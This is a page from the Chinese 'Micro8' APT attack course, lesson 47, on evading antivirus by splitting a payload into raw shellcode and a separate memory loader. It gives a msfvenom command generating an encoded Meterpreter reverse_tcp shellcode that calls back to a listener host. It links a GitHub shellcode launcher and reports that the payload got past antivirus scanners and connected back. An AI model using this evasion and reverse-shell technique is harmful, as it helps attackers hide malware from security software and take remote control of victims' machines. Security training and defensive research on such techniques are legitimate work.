Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
41-50课
第四十一课:bitsadmin一句话下载payload
第四十二课:攻击FTP服务
第四十三课:js一句话下载payload
第四十四课:ertutil一句话下载payload补充
第四十五课:解决bat一句话下载payload黑窗
第四十六课:powershell一句话下载payload
第四十七课:payload分离免杀思路
第四十八课:payload分离免杀思路第二季
第四十九课:关于Powershell对抗安全软件
第五十课:基于SqlDataSourceEnumerator发现内网存活主机
51-60课
61-70课
71-80课
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered By
GitBook
第四十七课:payload分离免杀思路
目前的反病毒安全软件,常见有三种,一种基于特征,一种基于行为,一种基于云查杀。云查杀的特点基本也可以概括为特征查杀。无论是哪种,都是特别针对 PE 头文件的查杀。尤其是当 payload 文件越大的时候,特征越容易查杀。
既然知道了目前的主流查杀方式,那么反制查杀,此篇采取特征与行为分离免杀。避免 PE 头文件,并且分离行为,与特征的综合免杀。适用于菜刀下等场景,也是我在基于 windows 下为了更稳定的一种常用手法。载入内存。
0x00:以msf为例:监听端口
0x01:这里的payload不采取生成pe文件,而采取shellcode方式,来借助第三方直接加载到内存中。避免行为:
1
msfvenom -p windows/x64/meterpreter/reverse_tcp
lhost
=
192.168
.1.5
lport
=
8080
-e x86/shikata_ga_nai -i
5
-f raw
>
test.c
Copied!
0x02:既然是shellcode方式的payload,那么一定需要借助第三方来启动,加载到内存。执行shellcode,自己写也不是很难,这里我借用一个github一个开源:
https://github.com/clinicallyinane/shellcode_launcher/
作者的话:建议大家自己写shellcode执行盒,相关代码网上非常成熟。如果遇到问题,随时可以问我。
生成的payload大小如下:476字节。还是 X32位的 payload。
国内世界杀毒网:
国际世界杀毒网:
上线成功。
Micropoor
Previous
第四十六课:powershell一句话下载payload
Next
第四十八课:payload分离免杀思路第二季
Last modified
3yr ago
Copy link
Contents
0x00:以msf为例:监听端口
0x01:这里的payload不采取生成pe文件,而采取shellcode方式,来借助第三方直接加载到内存中。避免行为:
0x02:既然是shellcode方式的payload,那么一定需要借助第三方来启动,加载到内存。执行shellcode,自己写也不是很难,这里我借用一个github一个开源: